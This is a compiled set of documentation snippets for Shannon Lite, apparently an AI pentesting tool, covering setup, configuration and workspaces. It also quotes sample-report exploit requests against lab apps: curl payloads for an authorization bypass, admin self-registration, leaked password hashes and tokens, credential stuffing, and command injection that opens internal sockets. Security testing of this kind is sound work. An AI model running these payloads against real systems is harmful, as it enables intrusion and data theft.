### Source-Build Shannon Lite Start Command Examples Source: https://github.com/keygraphhq/shannon/blob/main/docs/development.md Provides equivalent commands for starting Shannon Lite pentests using the source-built executable, mirroring the functionality of the npx examples. ```bash ./shannon start -u https://example.com -r /path/to/repo ./shannon start -u https://example.com -r /path/to/repo -c /path/to/my-config.yaml ./shannon start -u https://example.com -r /path/to/repo -o ./my-reports ./shannon start -u https://example.com -r /path/to/repo -w q1-audit ./shannon workspaces # Rebuild the worker image. ./shannon build --no-cache ``` -------------------------------- ### Shannon Lite Start Command Usage Examples Source: https://github.com/keygraphhq/shannon/blob/main/docs/development.md Illustrates various ways to start a Shannon Lite pentest using the npx command, including options for configuration files, custom output directories, and named workspaces. ```bash # Basic pentest. npx @keygraph/shannon start -u https://example.com -r /path/to/repo # With a configuration file. npx @keygraph/shannon start -u https://example.com -r /path/to/repo -c /path/to/my-config.yaml # Custom output directory. npx @keygraph/shannon start -u https://example.com -r /path/to/repo -o ./my-reports # Named workspace. npx @keygraph/shannon start -u https://example.com -r /path/to/repo -w q1-audit # List all workspaces. npx @keygraph/shannon workspaces ``` -------------------------------- ### Run Shannon Lite with Local Repository Path Source: https://github.com/keygraphhq/shannon/blob/main/docs/development.md Examples demonstrating how to start Shannon Lite using npx and source-build, specifying the target repository path. ```bash npx @keygraph/shannon start -u https://example.com -r /path/to/repo ./shannon start -u https://example.com -r ./relative/path ``` -------------------------------- ### Copy Example Configuration Source: https://github.com/keygraphhq/shannon/blob/main/docs/configuration.md Copy the example configuration file to your project directory to begin customization. ```bash cp configs/example-config.yaml ./my-app-config.yaml ``` -------------------------------- ### Setup and Start Shannon Lite via npx Source: https://github.com/keygraphhq/shannon/blob/main/docs/platforms.md Run Shannon Lite using npx after setting up WSL2 and Docker Desktop. Requires specifying the application URL and repository path. ```bash npx @keygraph/shannon setup npx @keygraph/shannon start -u https://your-app.com -r /path/to/your-repo ``` -------------------------------- ### Setup Wizard for Shannon Lite Source: https://github.com/keygraphhq/shannon/blob/main/docs/ai-providers.md Run the setup wizard to configure Shannon Lite with your chosen AI provider. This is the recommended approach for most users. ```bash npx @keygraph/shannon setup ``` -------------------------------- ### Source-build and Start Shannon Lite Source: https://github.com/keygraphhq/shannon/blob/main/docs/platforms.md Build Shannon Lite from source and start it. This involves cloning the repository, setting up environment variables, and running the start script with application URL and repository path. ```bash git clone https://github.com/KeygraphHQ/shannon.git cd shannon cp .env.example .env ./shannon start -u https://your-app.com -r /path/to/your-repo ``` -------------------------------- ### Install and Configure WSL2 on Windows Source: https://github.com/keygraphhq/shannon/blob/main/docs/platforms.md Commands to install WSL2, set the default version, list installed distributions, and install a new one if needed. Ensure Docker Desktop is configured to use the WSL2 backend. ```powershell wsl --install wsl --set-default-version 2 # Check installed distros. wsl --list --verbose # If you do not have a distro, install one. wsl --list --online wsl --install Ubuntu-24.04 # If your distro shows VERSION 1, convert it to WSL2. wsl --set-version 2 ``` -------------------------------- ### Source-Build Pentest Examples Source: https://github.com/keygraphhq/shannon/blob/main/llms-full.txt Examples of running a pentest using the source-built CLI, including options for configuration files, custom output directories, and named workspaces. ```bash ./shannon start -u https://example.com -r /path/to/repo ./shannon start -u https://example.com -r /path/to/repo -c /path/to/my-config.yaml ./shannon start -u https://example.com -r /path/to/repo -o ./my-reports ./shannon start -u https://example.com -r /path/to/repo -w q1-audit ./shannon workspaces ``` -------------------------------- ### Setup Shannon Lite Credentials Source: https://github.com/keygraphhq/shannon/blob/main/README.md Configure your AI provider credentials for Shannon Lite using the interactive wizard. Ensure you have Node.js 18+ and Docker installed. ```bash # Configure credentials with the interactive wizard. npx @keygraph/shannon setup ``` -------------------------------- ### Source-Build Equivalents for Workspaces Source: https://github.com/keygraphhq/shannon/blob/main/docs/workspaces.md These commands demonstrate the source-build mode equivalents for starting and listing workspaces. They use a local './shannon' executable instead of npx. ```bash ./shannon start -u https://example.com -r /path/to/repo -w my-audit ``` ```bash ./shannon start -u https://example.com -r /path/to/repo -w example-com_shannon-1771007534808 ``` ```bash ./shannon workspaces ``` -------------------------------- ### Start Shannon Lite with Local Application Access Source: https://github.com/keygraphhq/shannon/blob/main/docs/platforms.md Start Shannon Lite and configure it to access a local application running on your host machine using `host.docker.internal`. This is necessary because Docker containers cannot reach `localhost` on the host. ```bash npx @keygraph/shannon start -u http://host.docker.internal:3000 -r /path/to/repo ``` -------------------------------- ### Clone, Configure, Build, and Run Shannon Lite Source: https://github.com/keygraphhq/shannon/blob/main/docs/development.md Steps to clone the repository, set up environment variables, install dependencies, build the project, and run a pentest using the source-build method. ```bash # 1. Clone Shannon Lite. git clone https://github.com/KeygraphHQ/shannon.git cd shannon # 2. Configure credentials. cp .env.example .env # 3. Install dependencies and build. pnpm install pnpm build # 4. Run a pentest. ./shannon start -u https://your-app.com -r /path/to/your-repo ``` -------------------------------- ### Setup Local Environment Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Create a .env file to store your AI provider API key for local development. This is required before building or running the local CLI. ```bash echo "ANTHROPIC_API_KEY=your-key" > .env ``` -------------------------------- ### Start a Pentest with Shannon Lite Source: https://github.com/keygraphhq/shannon/blob/main/README.md Run a pentest against a source-available target using Shannon Lite. This command starts the tool, specifies the target URL, and indicates the local repository path for source code analysis. ```bash npx @keygraph/shannon start -u https://your-app.com -r /path/to/your-repo ``` -------------------------------- ### Login Flow Example Source: https://github.com/keygraphhq/shannon/blob/main/docs/configuration.md Define the sequence of actions for logging into an application, using placeholders for credentials. This is crucial for automated authentication. ```yaml login_flow: - "Type $username in " - "Click " - "Type $password in " - "Click " - "If prompted for 2FA, type $totp in " - "Click " ``` -------------------------------- ### Example response for admin registration Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-juice-shop.md The JSON response confirming the creation of an account with administrative privileges. ```json { "status": "success", "data": { "id": 65, "email": "pwned@evil.com", "role": "admin", "profileImage": "/assets/public/images/uploads/defaultAdmin.png" } } ``` -------------------------------- ### Run Shannon (Local mode) Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Start the Shannon agent in local mode, specifying the target URL and repository path. A configuration file can also be provided. ```bash ./shannon start -u -r my-repo ``` ```bash ./shannon start -u -r my-repo -c ./apps/worker/configs/my-config.yaml ``` ```bash ./shannon start -u -r /any/path/to/repo ``` -------------------------------- ### Source-build Shannon Lite with Local Application Access Source: https://github.com/keygraphhq/shannon/blob/main/docs/platforms.md Start Shannon Lite from source and configure it to access a local application using `host.docker.internal`. This bypasses the `localhost` limitation for Docker containers. ```bash ./shannon start -u http://host.docker.internal:3000 -r /path/to/repo ``` -------------------------------- ### Simulate Brute Force Attack Attempts Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-capital-api.md This example simulates brute force attempts against a login endpoint. It shows the target email and a list of passwords tested. No rate limiting was observed. ```text Target: bob_dev@checkmarx.com Passwords tested: ["password", "123456", "admin", "test", "IamDev", ...] ``` -------------------------------- ### Start a Named Workspace Source: https://github.com/keygraphhq/shannon/blob/main/docs/workspaces.md Use this command to start a new scan with a custom workspace name. This allows for easy identification and resumption of the scan later. ```bash npx @keygraph/shannon start -u https://example.com -r /path/to/repo -w my-audit ``` -------------------------------- ### Run Shannon with Configuration (Source-build) Source: https://github.com/keygraphhq/shannon/blob/main/docs/configuration.md Execute Shannon Lite in source-build mode, specifying the target URL, repository path, and your custom configuration file. ```bash ./shannon start -u https://example.com -r /path/to/repo -c ./my-app-config.yaml ``` -------------------------------- ### Initiate Password Reset Workflow Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-crapi.md Starts the password reset process for a target user email. ```bash curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/forget-password" \ -H "Content-Type: application/json" \ -d '{"email": "testuser2@example.com"}' ``` -------------------------------- ### Run Shannon with Configuration (npx) Source: https://github.com/keygraphhq/shannon/blob/main/docs/configuration.md Execute Shannon Lite using npx, specifying the target URL, repository path, and your custom configuration file. ```bash npx @keygraph/shannon start -u https://example.com -r /path/to/repo -c ./my-app-config.yaml ``` -------------------------------- ### Basic Shannon Configuration Structure Source: https://github.com/keygraphhq/shannon/blob/main/docs/configuration.md A sample YAML configuration file outlining key settings for Shannon Lite, including environment description, authentication details, and rules for testing scope. ```yaml # Describe your target environment. description: "Next.js e-commerce app on PostgreSQL. Local dev environment; .env files contain local-only credentials." # Limit which vulnerability classes run end-to-end. # vuln_classes: [injection, xss, auth, authz, ssrf] # Skip the exploitation phase. # exploit: "false" # Free-form rules of engagement. # rules_of_engagement: | # - No password brute-force; cap login attempts at 5 per account. # - Throttle to under 5 requests per second per endpoint; back off 60s on any 429. # - Use placeholders like [order_id] in deliverables; no real data values. authentication: login_type: form login_url: "https://your-app.com/login" credentials: username: "test@example.com" password: "yourpassword" totp_secret: "LB2E2RX7XFHSTGCK" # Optional mailbox credentials for magic-link or email-OTP flows. # email_login: # address: "inbox@example.com" # password: "mailbox-password" # totp_secret: "JBSWY3DPEHPK3PXP" login_flow: - "Type $username into the email field" - "Type $password into the password field" - "Click the 'Sign In' button" success_condition: type: url_contains value: "/dashboard" rules: avoid: - description: "AI should avoid testing logout functionality" type: url_path value: "/logout" # code_path values are repo-relative file paths or globs. # - description: "Out-of-scope vendored libraries" # type: code_path # value: "src/vendor/**" focus: - description: "AI should emphasize testing API endpoints" type: url_path value: "/api" # Filters applied by the report agent when assembling the final report. # report: # min_severity: low # min_confidence: low # guidance: | # Drop findings about missing security headers and rate-limit gaps. ``` -------------------------------- ### Authentication Bypass Response Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-capital-api.md Example of the successful authentication response returned by the vulnerable legacy endpoint. ```json { "user": { "username": "Pikachu", "email": "Pikachu@checkmarx.com", "admin": false, "token": "Keep it up!" }, "flag": "flag{Impr0peR_Ass3ts_ManAg3m3nt}" } ``` -------------------------------- ### Exploit anonymous access to memories endpoint Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-juice-shop.md Perform an unauthenticated GET request to retrieve all user memories. ```bash curl -s -i "http://juice-shop.sandbox.local:3001/rest/memories" ``` -------------------------------- ### Pentest with Configuration File using npx Source: https://github.com/keygraphhq/shannon/blob/main/llms-full.txt Run a pentest with a custom configuration file by providing the path to the YAML configuration file using the -c flag. ```bash npx @keygraph/shannon start -u https://example.com -r /path/to/repo -c /path/to/my-config.yaml ``` -------------------------------- ### Example response for memories endpoint Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-juice-shop.md The JSON response structure containing leaked user data and memory details. ```json { "status": "success", "data": [ { "UserId": 13, "id": 1, "caption": "😼 #zatschi #whoneedsfourlegs", "imagePath": "assets/public/images/uploads/ᓚᘏᗢ-#zatschi-#whoneedsfourlegs-1572600969477.jpg", "User": { "id": 13, "email": "bjoern@owasp.org", "password": "9283f1b2e9669749081963be0462e466", "role": "deluxe", "deluxeToken": "efe2f1599e2d93440d5243a1ffaf5a413b70cf3ac97156bd6fab9b5ddfcbe0e4" } }, // ... 9 more user memories with full user data ] } ``` -------------------------------- ### Build and Check Code (Development) Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Utilize pnpm and Turborepo for building and type-checking all packages in the monorepo. Biome is used for linting, formatting, and import sorting. ```bash pnpm run build ``` ```bash pnpm run check ``` ```bash pnpm biome ``` ```bash pnpm biome:fix ``` -------------------------------- ### Uninstall Shannon (npx mode) Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Remove the npx installation of Shannon, including the ~/.shannon/ directory. This action requires confirmation. ```bash npx @keygraph/shannon uninstall ``` -------------------------------- ### Register and Authenticate User Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-crapi.md Initial steps to create a user account and obtain a valid JWT token for subsequent API requests. ```bash curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/signup" \ -H "Content-Type: application/json" \ -d '{ "email": "ssrftest_unique_2024@example.com", "password": "TestPassword123!", "name": "SSRF Test User", "number": "5559876543" }' ``` ```bash curl -X POST "https://crapi.sandbox.local:8888/identity/api/auth/login" \ -H "Content-Type: application/json" \ -d '{ "email": "ssrftest_unique_2024@example.com", "password": "TestPassword123!" }' ``` -------------------------------- ### Admin Functionality Response Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-capital-api.md This is an example of the response received when successfully accessing the admin endpoint with a regular user token, indicating a vertical authorization bypass. ```json { "flag": "flag{BFL4_I_aM_Th3_aDm1n_H3r3!}", "description": "Complex access control policies with different hierarchies..." } ``` -------------------------------- ### Call add_exploit for Exploited Vulnerability Source: https://github.com/keygraphhq/shannon/blob/main/apps/worker/prompts/exploit-auth.txt This is an example of calling the `add_exploit` tool to report a successfully exploited vulnerability. The `status` should be 'exploited' and `vulnerability_id` must match an ID from the queue. ```python add_exploit(status='exploited', vulnerability_id='AUTH-VULN-01', evidence='Account takeover demonstrated via session hijacking.') ``` -------------------------------- ### Configure Credentials (npx mode) Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Use this command to interactively set up AI provider credentials for npx mode. Alternatively, export environment variables directly. ```bash npx @keygraph/shannon setup ``` ```bash export ANTHROPIC_API_KEY=your-key ``` -------------------------------- ### Debug Endpoint Command Execution Results Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-capital-api.md Example of the JSON response received after successful command execution via the debug endpoint. This shows the standard output and captured flag. ```json { "stdout": " 19:37:08 up 19 days, 8:49, 0 users, load average: 6.76, 6.15, 6.12\nroot\n", "flag": "flag{1nject10n_Ap1}", "description": "Attackers will feed the API with malicious data..." } ``` -------------------------------- ### Custom Base URL .env Configuration Source: https://github.com/keygraphhq/shannon/blob/main/docs/ai-providers.md Configure custom base URL and authentication token using a .env file for source-build mode. ```bash ANTHROPIC_BASE_URL=https://your-proxy.example.com ANTHROPIC_AUTH_TOKEN=your-auth-token ANTHROPIC_SMALL_MODEL=claude-haiku-4-5-20251001 ANTHROPIC_MEDIUM_MODEL=claude-sonnet-4-6 ANTHROPIC_LARGE_MODEL=claude-opus-4-7 ``` -------------------------------- ### Credential Stuffing with cURL Source: https://github.com/keygraphhq/shannon/blob/main/apps/worker/prompts/exploit-auth.txt Perform credential stuffing attacks by sending POST requests with JSON payloads containing usernames and passwords. This example uses cURL to attempt a login. ```bash curl -X POST -H "Content-Type: application/json" -d '{"username":"admin", "password":"CrackedPassword123"}' https://target.com/api/login ``` -------------------------------- ### Access Temporal Web UI on Windows Source: https://github.com/keygraphhq/shannon/blob/main/docs/platforms.md Instructions to find your WSL IP address using `ip addr` and access the Temporal Web UI from your Windows browser. ```bash ip addr ``` -------------------------------- ### Run Shannon (npx mode) Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Execute the Shannon agent using npx, providing the target URL and repository path. Ensure credentials are configured. ```bash npx @keygraph/shannon start -u -r /path/to/repo ``` -------------------------------- ### Create Deliverable with Save-Deliverable CLI Source: https://github.com/keygraphhq/shannon/blob/main/apps/worker/prompts/pipeline-testing/exploit-auth.txt Generate a deliverable file (e.g., Markdown) containing evidence of authentication exploitation. The content is passed as a string argument, allowing for detailed reporting. ```bash save-deliverable --type AUTH_EVIDENCE --content '# Authentication Exploitation Evidence (Pipeline Test)\n\n**Playwright Session:** {{PLAYWRIGHT_SESSION}}\n**Test Site:** https://example.com\n**Screenshot:** auth-exploit-test.png\n**Status:** Browser isolation test successful\n\n## Exploitation Results\n- **Target:** Test authentication vulnerability\n- **Method:** Authentication bypass via parameter manipulation\n- **Evidence:** Successfully bypassed login using admin=true parameter\n- **Impact:** Demonstrated unauthorized access to protected resources\n- **Proof:** Pipeline testing mode - simulated successful exploitation\n\n## Technical Details\n- **Vulnerability ID:** AUTH-VULN-01\n- **Exploitation Status:** Simulated Success (Pipeline Test)\n- **Session:** {{PLAYWRIGHT_SESSION}}\n- **Attack Vector:** Parameter-based authentication bypass\n- **Bypass Method:** URL parameter manipulation' ``` -------------------------------- ### Create Product Using Customer Token Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-juice-shop.md Attempts to create a new product using a customer token. This demonstrates an authorization bypass vulnerability. ```bash curl -s -i -X POST "http://juice-shop.sandbox.local:3001/api/Products" \ -H "Authorization: Bearer [CUSTOMER_TOKEN]" \ -H "Content-Type: application/json" \ -d '{ "name": "Hacked Product by Regular User", "description": "This product was created by a regular customer account - proving authorization bypass!", "price": 999.99, "image": "malicious.jpg" }' ``` -------------------------------- ### Log Test Results Source: https://github.com/keygraphhq/shannon/blob/main/apps/worker/prompts/pipeline-testing/exploit-xss.txt Log the successful navigation to example.com for the XSS exploit agent, indicating the session used. ```javascript console.log("🟠 XSS EXPLOIT AGENT - Session: {{PLAYWRIGHT_SESSION}} - Successfully navigated to example.com") ``` -------------------------------- ### Open Temporal Web UI Source: https://github.com/keygraphhq/shannon/blob/main/docs/development.md Command to open the Temporal Web UI, which provides detailed monitoring of Shannon Lite's operations. ```bash open http://localhost:8233 ``` -------------------------------- ### Register as Regular Customer Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-juice-shop.md Registers a new customer account. Requires valid customer-level authentication token for subsequent steps. ```bash curl -s -i -X POST "http://juice-shop.sandbox.local:3001/api/Users" \ -H "Content-Type: application/json" \ -d '{ "email": "regular@user.com", "password": "Password123!", "passwordRepeat": "Password123!" }' ``` -------------------------------- ### List All Workspaces Source: https://github.com/keygraphhq/shannon/blob/main/docs/workspaces.md This command displays a list of all available workspaces. This is useful for managing and identifying workspaces for resumption. ```bash npx @keygraph/shannon workspaces ``` -------------------------------- ### Basic Pentest with npx Source: https://github.com/keygraphhq/shannon/blob/main/llms-full.txt Initiate a basic penetration test using the npx command, specifying the target URL and repository path. ```bash npx @keygraph/shannon start -u https://example.com -r /path/to/repo ``` -------------------------------- ### Demonstrate SSRF via Command Injection Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-capital-api.md Uses Python's socket module via command injection to establish a connection to an internal service. ```bash curl -X POST "" \ -H "Content-Type: application/json" \ -H "Authorization: Token [JWT_TOKEN]" \ -d '{"body": {"command": "uptime; /usr/local/bin/python3 -c \"import socket; s=socket.socket(); s.connect(('"'"'127.0.0.1'"'"', 8000)); print('"'"'Connected to 127.0.0.1:8000'"'"'); s.close()\""}}' ``` -------------------------------- ### Register User Account with Curl Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-capital-api.md Use this command to register a new user account. Ensure the Content-Type header is set to application/json. ```bash curl -X POST "" \ -H "Content-Type: application/json" \ -d '{ "user": { "username": "exploiter1", "email": "exploiter1@test.com", "password": "SecurePass123!" } }' ``` -------------------------------- ### Create a Test Coupon Source: https://github.com/keygraphhq/shannon/blob/main/sample-reports/shannon-report-crapi.md Use this command to create a new test coupon. Ensure you have a valid JWT Bearer token and replace '[USER_TOKEN]' accordingly. ```bash curl -X POST "https://crapi.sandbox.local:8888/community/api/v2/coupon/new-coupon" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer [USER_TOKEN]" \ -d '{ "amount": "20", "coupon_code": "TESTCOUPON20" }' ``` -------------------------------- ### Manage Workspaces Source: https://github.com/keygraphhq/shannon/blob/main/CLAUDE.md Create a new named workspace for an audit or resume a previous one using the same command. List all available workspaces. ```bash ./shannon start -u -r my-repo -w my-audit ``` ```bash ./shannon workspaces ``` -------------------------------- ### List All Workspaces Source: https://github.com/keygraphhq/shannon/blob/main/llms-full.txt View a list of all available workspaces managed by Shannon Lite. This command helps in identifying and managing existing scan states. ```bash npx @keygraph/shannon workspaces ``` ```bash ./shannon workspaces ``` -------------------------------- ### Export Google Vertex AI Configuration Source: https://github.com/keygraphhq/shannon/blob/main/docs/ai-providers.md Export environment variables to configure Shannon Lite for Google Vertex AI, including project ID, credentials, and model IDs. ```bash export CLAUDE_CODE_USE_VERTEX=1 export CLOUD_ML_REGION=us-east5 export ANTHROPIC_VERTEX_PROJECT_ID=your-gcp-project-id export GOOGLE_APPLICATION_CREDENTIALS=/path/to/your-sa-key.json export ANTHROPIC_SMALL_MODEL=claude-haiku-4-5@20251001 export ANTHROPIC_MEDIUM_MODEL=claude-sonnet-4-6 export ANTHROPIC_LARGE_MODEL=claude-opus-4-7 ``` -------------------------------- ### Anthropic .env Configuration Source: https://github.com/keygraphhq/shannon/blob/main/docs/ai-providers.md Configure Anthropic API key and Claude model output tokens using a .env file for source-build mode. ```bash ANTHROPIC_API_KEY=your-api-key CLAUDE_CODE_MAX_OUTPUT_TOKENS=64000 ```